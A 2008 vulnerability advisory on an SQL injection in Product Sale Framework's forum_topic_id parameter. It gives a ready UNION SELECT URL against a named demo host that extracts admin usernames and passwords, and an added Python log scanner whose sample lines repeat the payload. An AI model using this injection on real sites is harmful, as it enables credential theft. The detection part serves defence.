Product Sale Framework 0.1b (forum_topic_id) SQL Injection Vulnerability

2008-12-07 06:00:06

+++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
+ +
+ Product Sale Framework sql injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


APA Center of Yazd University
(https://www.ircert.cc)


AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 06 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: [email protected]

#####################################################

APPLICATION : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR : http://www.productsaleframework.com
DEMO (links) : http://www.productsaleframework.com

#####################################################


[+] vuln :
customer.forumtopic.php

The vulnerability is in the forum. All demo links (Admin demo, Affiliate demo, Customer demo) are here:

http://www.productsaleframework.com/

[+] Exploit :
Admin Username and Password:

http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
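
[+] Detection (added example, not part of the original advisory or of the PSF code base):
A log check that flags requests to customer.forumtopic.php whose forum_topic_id is not a plain number. It assumes forum_topic_id is meant to be a numeric id and that the web server writes combined-format access logs; the log lines, paths and addresses below are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCRIPT = "customer.forumtopic.php"   # script named in the advisory
PARAM = "forum_topic_id"             # parameter named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
SQL_HINT_RE = re.compile(r"\b(?:union|select|concat|from)\b|0x[0-9a-f]+|--|/\*", re.I)

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [07/Dec/2008:06:00:01 +0000] "GET /psf/customer/customer.forumtopic.php?forum_topic_id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [07/Dec/2008:06:00:06 +0000] "GET /psf/customer/customer.forumtopic.php?forum_topic_id=-1%20union%20select%20concat(username,0x3a,password),2,3,4,5,6%20from%20psf_config_tb HTTP/1.1" 200 911',
    '203.0.113.7 - - [07/Dec/2008:06:00:09 +0000] "GET /psf/customer/customer.forumtopic.php?forum_topic_id=-1%2520UNION%2520SELECT%25201 HTTP/1.1" 200 640',
    '203.0.113.7 - - [07/Dec/2008:06:00:11 +0000] "GET /psf/customer/customer.forumtopic.php?forum_topic_id=-1 HTTP/1.1" 200 640',
    '198.51.100.4 - - [07/Dec/2008:06:00:15 +0000] "GET /psf/index.php?q=student+union HTTP/1.1" 200 2048',
]

def classify(value):
    """Return None for a plain numeric id (assumed format), else a reason string."""
    decoded = value
    for _ in range(3):                     # undo nested percent-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if re.fullmatch(r"[0-9]{1,10}", decoded.strip()):
        return None
    return "sql-keywords" if SQL_HINT_RE.search(decoded) else "non-numeric"

def scan(lines):
    """Return (line_number, reason, decoded_once_value) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)        # tolerates raw spaces in the logged URL
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + SCRIPT):
            continue                       # only the script from the advisory
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            reason = classify(value)
            if reason:
                findings.append((n, reason, value))
    return findings

if __name__ == "__main__":
    for n, reason, value in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}: {value}")
```

The same numeric-only rule can be enforced in the application before the value reaches the query.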


##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

Fixes

No fixes
